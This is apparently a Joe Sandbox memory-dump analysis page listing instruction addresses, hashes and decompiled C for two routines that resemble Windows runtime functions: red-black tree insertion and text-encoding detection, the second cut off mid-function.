                                              0x051e231e
                                              0x051e231e
                                              0x051e2320
                                              0x051e2325
                                              0x051e232a
                                              0x051e232c
                                              0x051e233e
                                              0x051e233e
                                              0x00000000
                                              0x051e232c
                                              0x051e2311
                                              0x051e2317
                                              0x051e231a
                                              0x051e231c
                                              0x051e2380
                                              0x051e2380
                                              0x051e2380
                                              0x051e2384
                                              0x00000000
                                              0x00000000
                                              0x051e2386
                                              0x00000000
                                              0x051e231c
                                              0x051e225c
                                              0x051e225c
                                              0x00000000
                                              0x051e225c
                                              0x051e212a
                                              0x051e2134
                                              0x051e2138
                                              0x051e213d
                                              0x05225858
                                              0x05225863
                                              0x05225863
                                              0x05225867
                                              0x0522586a
                                              0x00000000
                                              0x00000000
                                              0x0522586c
                                              0x0522586c
                                              0x05225871
                                              0x05225875
                                              0x05225877
                                              0x05225997
                                              0x0522599c
                                              0x052259a1
                                              0x052259a7
                                              0x052259a7
                                              0x00000000
                                              0x052259a7
                                              0x0522587d
                                              0x00000000
                                              0x0522588b
                                              0x0522588b
                                              0x05225890
                                              0x05225892
                                              0x05225894
                                              0x05225899
                                              0x0522589b
                                              0x052258a0
                                              0x052258a0
                                              0x052258aa
                                              0x052258b2
                                              0x052258b6
                                              0x052258be
                                              0x052258c6
                                              0x052258c9
                                              0x0522590d
                                              0x05225917
                                              0x0522591a
                                              0x0522591c
                                              0x05225920
                                              0x05225928
                                              0x0522592a
                                              0x0522592c
                                              0x0522592e
                                              0x0522592e
                                              0x052258cb
                                              0x052258cd
                                              0x052258d8
                                              0x052258e0
                                              0x052258f4
                                              0x052258fe
                                              0x052258fe
                                              0x0522593a
                                              0x0522593e
                                              0x05225940
                                              0x05225942
                                              0x00000000
                                              0x05225944
                                              0x05225944
                                              0x05225949
                                              0x0522594e
                                              0x0522594e
                                              0x05225953
                                              0x0522595b
                                              0x05225976
                                              0x05225976
                                              0x0522597a
                                              0x0522597f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05225981
                                              0x05225981
                                              0x05225981
                                              0x05225983
                                              0x05225988
                                              0x0522598d
                                              0x05225991
                                              0x05225991
                                              0x00000000
                                              0x0522595d
                                              0x0522595d
                                              0x05225963
                                              0x05225965
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05225967
                                              0x05225967
                                              0x0522596b
                                              0x0522596d
                                              0x00000000
                                              0x00000000
                                              0x0522596f
                                              0x05225971
                                              0x05225971
                                              0x05225974
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05225974
                                              0x00000000
                                              0x05225967
                                              0x0522595b
                                              0x05225942
                                              0x05225863
                                              0x051e2143
                                              0x051e2143
                                              0x051e2149
                                              0x051e214f
                                              0x051e22ec
                                              0x051e22f1
                                              0x051e22f6
                                              0x00000000
                                              0x051e22f6
                                              0x051e2159
                                              0x051e2173
                                              0x051e2173
                                              0x051e217d
                                              0x051e2181
                                              0x051e2186
                                              0x052259ae
                                              0x052259b2
                                              0x052259b5
                                              0x052259b7
                                              0x052259ba
                                              0x052259cd
                                              0x052259d1
                                              0x052259d5
                                              0x052259d9
                                              0x052259db
                                              0x00000000
                                              0x00000000
                                              0x052259dd
                                              0x052259dd
                                              0x052259e1
                                              0x052259e4
                                              0x052259e7
                                              0x052259ee
                                              0x052259ee
                                              0x052259f3
                                              0x052259f3
                                              0x00000000
                                              0x051e2186
                                              0x051e2164
                                              0x051e216d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051e216d
                                              0x051e2106
                                              0x051e2266
                                              0x051e20d8
                                              0x051e20da
                                              0x051e20e0
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 229c791097bd378f0a5b3ec69742985289d9eb95b67647eba00580e41142cb47
                                              • Instruction ID: b637894a0d14b379ae3c0a1ee9a97cddb6b935c787b9136669028a40090bbf5c
                                              • Opcode Fuzzy Hash: 229c791097bd378f0a5b3ec69742985289d9eb95b67647eba00580e41142cb47
                                              • Instruction Fuzzy Hash: 59F127397187529FD725CF28C854B2AB7EABF85310F09C51DF8AA8B280D774D841CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051CB090 Relevance: .4, Instructions: 405COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 99%
                                              			E051CB090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}








































                                              0x051cb095
                                              0x051cb09b
                                              0x051cb09f
                                              0x051cb0a5
                                              0x051cb0a7
                                              0x051cb0aa
                                              0x051cb0ad
                                              0x051cb0b1
                                              0x051cb3f8
                                              0x051cb3fa
                                              0x051cb3ff
                                              0x051cb419
                                              0x051cb41b
                                              0x051cb41b
                                              0x051cb401
                                              0x00000000
                                              0x051cb0b7
                                              0x051cb0b9
                                              0x051cb0bc
                                              0x051cb0c0
                                              0x051cb0c2
                                              0x051cb0c2
                                              0x051cb0c4
                                              0x051cb0c8
                                              0x051cb0cf
                                              0x051cb0d1
                                              0x051cb0d1
                                              0x051cb0da
                                              0x051cb0dd
                                              0x051cb0df
                                              0x051cb0df
                                              0x051cb0e4
                                              0x051cb0e9
                                              0x051cb3e2
                                              0x051cb3e5
                                              0x051cb3eb
                                              0x0521a676
                                              0x0521a67b
                                              0x0521a67d
                                              0x051cb3f1
                                              0x051cb3f1
                                              0x051cb3f1
                                              0x051cb0ef
                                              0x051cb0ef
                                              0x051cb0ef
                                              0x051cb0e9
                                              0x051cb0f6
                                              0x051cb28d
                                              0x051cb28e
                                              0x051cb293
                                              0x051cb0fc
                                              0x051cb0fc
                                              0x051cb101
                                              0x051cb104
                                              0x051cb107
                                              0x051cb10c
                                              0x0521a687
                                              0x0521a68d
                                              0x0521a68d
                                              0x0521a687
                                              0x051cb112
                                              0x051cb116
                                              0x0521a696
                                              0x0521a69c
                                              0x0521a69c
                                              0x0521a696
                                              0x051cb120
                                              0x051cb121
                                              0x051cb124
                                              0x051cb127
                                              0x051cb12a
                                              0x051cb12d
                                              0x051cb132
                                              0x0521a6a5
                                              0x00000000
                                              0x00000000
                                              0x0521a6ab
                                              0x00000000
                                              0x051cb138
                                              0x051cb138
                                              0x051cb13a
                                              0x051cb193
                                              0x051cb197
                                              0x051cb19d
                                              0x051cb29c
                                              0x051cb29f
                                              0x051cb2a2
                                              0x051cb2a7
                                              0x0521a6d2
                                              0x0521a6d8
                                              0x0521a6d8
                                              0x0521a6d2
                                              0x051cb2af
                                              0x051cb420
                                              0x051cb422
                                              0x051cb423
                                              0x00000000
                                              0x051cb2b5
                                              0x051cb2b5
                                              0x051cb2ba
                                              0x0521a6e1
                                              0x0521a6e7
                                              0x0521a6e7
                                              0x0521a6e1
                                              0x051cb2c2
                                              0x00000000
                                              0x051cb2c8
                                              0x051cb2cb
                                              0x051cb2d0
                                              0x0521a6f0
                                              0x0521a6f6
                                              0x0521a6f6
                                              0x0521a6f0
                                              0x051cb2d8
                                              0x00000000
                                              0x051cb2de
                                              0x051cb2de
                                              0x051cb2de
                                              0x051cb2e1
                                              0x051cb2e6
                                              0x051cb2eb
                                              0x0521a6ff
                                              0x0521a705
                                              0x0521a705
                                              0x0521a6ff
                                              0x051cb2f3
                                              0x00000000
                                              0x051cb2f9
                                              0x051cb2fb
                                              0x051cb2fd
                                              0x051cb301
                                              0x051cb303
                                              0x051cb303
                                              0x051cb308
                                              0x051cb30b
                                              0x051cb310
                                              0x051cb312
                                              0x051cb312
                                              0x051cb31c
                                              0x051cb322
                                              0x051cb327
                                              0x0521a70e
                                              0x051cb335
                                              0x051cb337
                                              0x0521a71d
                                              0x0521a723
                                              0x0521a723
                                              0x0521a71d
                                              0x051cb340
                                              0x051cb345
                                              0x051cb349
                                              0x0521a72a
                                              0x0521a72a
                                              0x051cb352
                                              0x051cb357
                                              0x051cb359
                                              0x051cb359
                                              0x051cb365
                                              0x051cb367
                                              0x051cb36c
                                              0x00000000
                                              0x051cb36c
                                              0x0521a714
                                              0x0521a714
                                              0x051cb32f
                                              0x051cb3b8
                                              0x051cb3bd
                                              0x051cb3c4
                                              0x051cb425
                                              0x051cb427
                                              0x051cb429
                                              0x051cb429
                                              0x051cb427
                                              0x051cb3c8
                                              0x00000000
                                              0x00000000
                                              0x051cb3ce
                                              0x051cb42f
                                              0x051cb3d0
                                              0x051cb3d0
                                              0x051cb3d0
                                              0x051cb3d7
                                              0x051cb3da
                                              0x051cb3da
                                              0x00000000
                                              0x051cb32f
                                              0x051cb2f3
                                              0x051cb2d8
                                              0x051cb2c2
                                              0x051cb2af
                                              0x051cb1a3
                                              0x051cb1a9
                                              0x051cb1af
                                              0x051cb1b2
                                              0x051cb1b5
                                              0x051cb1b8
                                              0x0521a733
                                              0x0521a739
                                              0x0521a739
                                              0x0521a733
                                              0x051cb1c0
                                              0x00000000
                                              0x051cb1c6
                                              0x051cb1c8
                                              0x051cb1cb
                                              0x051cb1ce
                                              0x051cb1d3
                                              0x0521a742
                                              0x0521a748
                                              0x0521a748
                                              0x0521a742
                                              0x051cb1db
                                              0x00000000
                                              0x051cb1e1
                                              0x051cb1e1
                                              0x051cb1e6
                                              0x051cb1e9
                                              0x051cb1ee
                                              0x0521a751
                                              0x051cb409
                                              0x051cb409
                                              0x051cb40e
                                              0x00000000
                                              0x00000000
                                              0x051cb410
                                              0x051cb22d
                                              0x051cb22f
                                              0x0521a790
                                              0x0521a796
                                              0x0521a796
                                              0x0521a790
                                              0x051cb23d
                                              0x051cb243
                                              0x051cb248
                                              0x0521a79f
                                              0x00000000
                                              0x00000000
                                              0x0521a7a5
                                              0x00000000
                                              0x051cb24e
                                              0x051cb24e
                                              0x051cb250
                                              0x051cb374
                                              0x051cb379
                                              0x051cb37e
                                              0x0521a7ae
                                              0x0521a7b4
                                              0x0521a7b4
                                              0x0521a7ae
                                              0x051cb386
                                              0x00000000
                                              0x051cb38c
                                              0x051cb38e
                                              0x0521a7bd
                                              0x051cb394
                                              0x051cb394
                                              0x051cb394
                                              0x051cb39b
                                              0x051cb39e
                                              0x00000000
                                              0x051cb39e
                                              0x051cb386
                                              0x051cb256
                                              0x051cb258
                                              0x0521a7c6
                                              0x0521a7cc
                                              0x0521a7cc
                                              0x0521a7c6
                                              0x051cb261
                                              0x051cb266
                                              0x051cb26a
                                              0x0521a7d3
                                              0x0521a7d3
                                              0x051cb273
                                              0x051cb278
                                              0x051cb27a
                                              0x051cb27a
                                              0x051cb281
                                              0x051cb283
                                              0x051cb285
                                              0x051cb287
                                              0x051cb289
                                              0x00000000
                                              0x051cb289
                                              0x051cb248
                                              0x0521a757
                                              0x0521a757
                                              0x051cb1f6
                                              0x00000000
                                              0x00000000
                                              0x051cb1fc
                                              0x051cb201
                                              0x0521a760
                                              0x0521a766
                                              0x0521a766
                                              0x0521a760
                                              0x051cb209
                                              0x051cb3a8
                                              0x0521a76f
                                              0x051cb3ae
                                              0x051cb3ae
                                              0x051cb3ae
                                              0x051cb3b0
                                              0x00000000
                                              0x051cb20f
                                              0x051cb20f
                                              0x051cb213
                                              0x0521a778
                                              0x0521a77e
                                              0x0521a77e
                                              0x0521a778
                                              0x051cb21b
                                              0x00000000
                                              0x051cb221
                                              0x051cb223
                                              0x0521a787
                                              0x051cb229
                                              0x051cb229
                                              0x051cb229
                                              0x051cb22b
                                              0x00000000
                                              0x051cb22b
                                              0x051cb21b
                                              0x051cb209
                                              0x051cb1db
                                              0x051cb142
                                              0x051cb142
                                              0x051cb146
                                              0x051cb148
                                              0x051cb14c
                                              0x051cb14f
                                              0x051cb154
                                              0x051cb15b
                                              0x0521a6b4
                                              0x00000000
                                              0x00000000
                                              0x0521a6ba
                                              0x0521a6ba
                                              0x051cb163
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051cb163
                                              0x051cb13a
                                              0x051cb169
                                              0x051cb16b
                                              0x051cb16e
                                              0x051cb171
                                              0x051cb175
                                              0x051cb178
                                              0x0521a6c3
                                              0x0521a6c9
                                              0x0521a6c9
                                              0x0521a6c3
                                              0x051cb180
                                              0x051cb184
                                              0x00000000
                                              0x051cb104
                                              0x051cb0f6

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                              • Instruction ID: c6859ee48f7778f961c438eea76a6fe9880a2ce504fc5c078bb931ada4c5d4a4
                                              • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                              • Instruction Fuzzy Hash: 5ED1E63171D2568BCB35CE69C482A7ABFE3BFA5214B6981ECDC5ACB241E733D8418750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051B0D20 Relevance: .4, Instructions: 372COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 99%
                                              			E051B0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x52a6d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x52a6920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x52a6920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
